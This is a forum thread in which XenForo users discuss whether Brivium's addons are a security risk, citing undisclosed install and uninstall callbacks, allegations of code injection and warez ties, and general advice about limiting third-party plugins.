- Joined
- May 22, 2014
- Messages
- 74
Point taken sir.
Do you consider Brivium addons a security risk?
- Thread starter Alpha1
- Start date
-
- Tags
- brivium controversy
- Joined
- May 26, 2012
- Messages
- 24
I have never used a Brivium addon but I am wondering; has any coder audited their addon codes? I am sure it is possible to remove the callbacks without modifying the functionality of the addon.
- Joined
- Oct 20, 2014
- Messages
- 1,337
I don't use them and my answer is still yes.
- Joined
- Dec 5, 2011
- Messages
- 431
All information is not secure, I wouldn't never use there addons again, cause everything would be put at risk.
From my humble experience in web app security auditing and old teen times hacking websites and replacing index.html then registering them at zone-h.
That was fun. Well this thread is straying to more of a "blind panic" approach than a reasonable one where someone actually audits at least one small plugin to check for callbacks and if they're there just for license check and confirm with documentation. This hasn't been done. Which makes me think all the members who replied in this thread aren't experienced on the technical side.
I agree, brivium looks shady after the recent event on TAZ, although I wouldn't agree all their plugins are infected just over the fact a member from TAZ who have permissions to edit threads got hacked for the benefit of brivium to remove their negative reputation.
We want more experienced coders to actually audit some very useful plugin that brivium made. And there's nulled versions of them, in case you don't want to buy just for testing.
Other than that, I think using some of Brivium plugins to achieve simple functionality won't be that disaster you imagine in your mind with no proof on the technical aspects to support your wild imagination.
On the negative side, and regardless of whether Brivium plugins are all infected, it's actually not healthy to install a a lot of plugins, most sites get hacked due to vulnerable plugins, a hacker will always search what plugins you installed and start the penetration testing phase, and brivium's approach encourages this unhealthy practice with a lot of addons that only achieve simple functionality, sometimes it's just an "<a href> added in a template, they call it plugin and sell for 10$.
That was fun. Well this thread is straying to more of a "blind panic" approach than a reasonable one where someone actually audits at least one small plugin to check for callbacks and if they're there just for license check and confirm with documentation. This hasn't been done. Which makes me think all the members who replied in this thread aren't experienced on the technical side.
I agree, brivium looks shady after the recent event on TAZ, although I wouldn't agree all their plugins are infected just over the fact a member from TAZ who have permissions to edit threads got hacked for the benefit of brivium to remove their negative reputation.
We want more experienced coders to actually audit some very useful plugin that brivium made. And there's nulled versions of them, in case you don't want to buy just for testing.
Other than that, I think using some of Brivium plugins to achieve simple functionality won't be that disaster you imagine in your mind with no proof on the technical aspects to support your wild imagination.
On the negative side, and regardless of whether Brivium plugins are all infected, it's actually not healthy to install a a lot of plugins, most sites get hacked due to vulnerable plugins, a hacker will always search what plugins you installed and start the penetration testing phase, and brivium's approach encourages this unhealthy practice with a lot of addons that only achieve simple functionality, sometimes it's just an "<a href> added in a template, they call it plugin and sell for 10$.
Last edited:
- Joined
- Jul 21, 2014
- Messages
- 890
A thing, or maybe a thong, lets all sing a song, nah thats just wrong. Ping Pong?
- Joined
- Feb 15, 2015
- Messages
- 311
Experience coders have looked at Brivium's addons. Brivium is the entire reason XenForo.com has the policy about disclosure of callbacks during install/uninstall and has explicit provisions that uninstalling should not require an external server.
Brivium's addons allowed undisclosed arbitrary SQL and php to be downloaded and executed on install & uninstall. That is utterly unacceptable. Especially given the still current links with addon warez sites.
- Joined
- Jan 31, 2006
- Messages
- 2,005
Oh HEY... Whoa, man, I'm on oxygen here dude! Give a guy a little warning. You almost gave me another heart attack.
Okay now, lemme catch my breath... get a quick hit on the Albuterol... crank up the o2 liters... check my spirometry... whew...
where's that replay button again?
- Joined
- Jul 9, 2006
- Messages
- 20,983
Hilarious post!
I can imagine you getting your jam on to that thong tha-thong-thong-thong!!!
I bet you cut a rug to entire pieces LOL
J.
Even before the ban, when some people complained about Brivium on the official xenforo forums they have get ip bans on Brivium's site. Their code has unnecessary callbacks and they DO inject code. They own a warez forum. They are suspected of hacking a mods account here. Their code structure is misleading and untidy. Everything about them reeks of behavior that is reminiscent of people who distribute warez. Oh yes, they can't be trusted.
- Joined
- Oct 18, 2013
- Messages
- 8,960
If I was ever to start a site using XenForo, I for sure would not use any of their mods. They are a shady, untrustable bunch.
- Thread starter
- Moderator
- #74
- Joined
- May 28, 2007
- Messages
- 4,268
Nope. thats for sure.
- Joined
- Feb 4, 2017
- Messages
- 17
Please can you can let me know that Brivium add-on Developer are "borbole" former vB Coder/Designer ? I am still using some add-on from Brivium Paid addon. Please let me know that if this I am now under any security risk?
- Joined
- Oct 18, 2013
- Messages
- 8,960
I would not use any of their addons, any one or all of them could have serious security issues.
- Joined
- Feb 4, 2017
- Messages
- 17
Do you know Brivium add-on Developer are is "borbole" ? What type security issues ? Any kind of security issues fix are not come from Brivium add-on Developer?
- Joined
- Oct 18, 2013
- Messages
- 8,960
He is/was/maybe one of the group, their addons have been found to have many security issues, that is one of the reasons they are banned from the XF forum. I would not trust them ever!!
- Joined
- Feb 25, 2013
- Messages
- 4,898
No.
Borbole sold his add-ons to Brivium.
- Joined
- Jan 2, 2006
- Messages
- 2,603
I consider all addons, plugins or 3rd party extensions to be a security risk 